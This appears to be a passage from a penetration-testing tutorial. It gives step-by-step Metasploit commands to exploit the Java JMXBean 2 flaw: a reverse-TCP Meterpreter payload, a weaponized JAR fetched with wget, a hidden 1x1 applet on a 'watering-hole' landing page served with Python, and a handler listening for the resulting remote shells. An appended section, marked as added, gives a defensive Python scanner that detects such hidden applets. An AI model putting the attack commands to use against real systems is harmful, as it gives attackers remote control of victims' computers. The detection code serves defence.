In this case, the Java JMXBean 2 vulnerability, which affects Java versions 1.7 and under, will be leveraged.
Start the Metasploit console ('msfconsole') and select the exploit module:
use exploit/multi/browser/java_jre17_jmxbean_2
Set the payload (Java Meterpreter Reverse TCP):
set PAYLOAD java/meterpreter/reverse_tcp
Show and set options:
show options
The interest here is only to grab the JAR file from the Metasploit server, so set SRVHOST to 127.0.0.1. However, keep in mind that the LHOST variable should be set to point to the IP that will actually host the Meterpreter listener. In this example, I set the LHOST to 10.0.0.10.
set SRVHOST 127.0.0.1
set LHOST 10.0.0.10
Now start the listener:
exploit
Take note of the URI path; it's randomized and will be different from the one in the above screenshot. Create a 'wget' request and grab the weaponized JAR.
wget http://127.0.0.1:8080/TneGeXfpn2/Archive.jar
We can now use Python to create a simple webserver to host the "watering-hole" landing page. First, we create the 'index.html' file with embed code to invoke the JAR:
<html><head></head><body><applet archive="Archive.jar" code="Exploit.class" width="1" height="1"></applet></body></html>
Dump both the 'index.html' and 'Archive.jar' into a world-readable directory. From within that directory, execute the Python command to launch the web server:
python -m SimpleHTTPServer 80
Don't forget to start your Metasploit listener on the machine you pointed the LHOST IP variable back to.
use exploit/multi/handler
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 10.0.0.10
exploit
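From the defender's side, the landing page above has a recognizable shape: an applet tag that loads a JAR and is rendered at 1x1 pixels. The following is an added example, not code from the original post, that scans HTML (for instance from a proxy or crawler) for that pattern; the function names, the 2-pixel threshold and the sample pages are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

JAVA_TAGS = {"applet", "object", "embed"}  # tags that can load Java content
MAX_HIDDEN_PX = 2  # assumed threshold for "effectively invisible"

# Constructed samples: the landing-page markup from this post, and a visible applet.
SAMPLE_LANDING = ('<html><head></head><body><applet archive="Archive.jar" '
                  'code="Exploit.class" width="1" height="1"></applet></body></html>')
SAMPLE_VISIBLE = ('<applet archive="chart.jar" code="Chart.class" '
                  'width="400" height="300"></applet>')


def _px(value):
    """Return a pixel size as int, or None for missing, percent or malformed values."""
    m = re.fullmatch(r"\s*(\d+)\s*(?:px)?\s*", value or "", re.I)
    return int(m.group(1)) if m else None


class HiddenAppletFinder(HTMLParser):
    """Collects Java-loading tags that reference a .jar and are sized to be invisible."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in JAVA_TAGS:
            return
        a = {k: (v or "") for k, v in attrs}
        archive = a.get("archive") or a.get("data") or a.get("src") or ""
        loads_jar = archive.lower().split("?")[0].endswith(".jar")
        w, h = _px(a.get("width")), _px(a.get("height"))
        hidden = any(d is not None and d <= MAX_HIDDEN_PX for d in (w, h))
        if loads_jar and hidden:
            self.findings.append({"tag": tag, "archive": archive,
                                  "code": a.get("code", ""), "line": self.getpos()[0]})


def find_hidden_applets(html):
    """Return one finding per hidden JAR-loading tag in the given HTML text."""
    finder = HiddenAppletFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    for hit in find_hidden_applets(SAMPLE_LANDING):
        print("hidden Java loader:", hit)
```

The check only reads width and height attributes, so an applet hidden through CSS would need a separate rule.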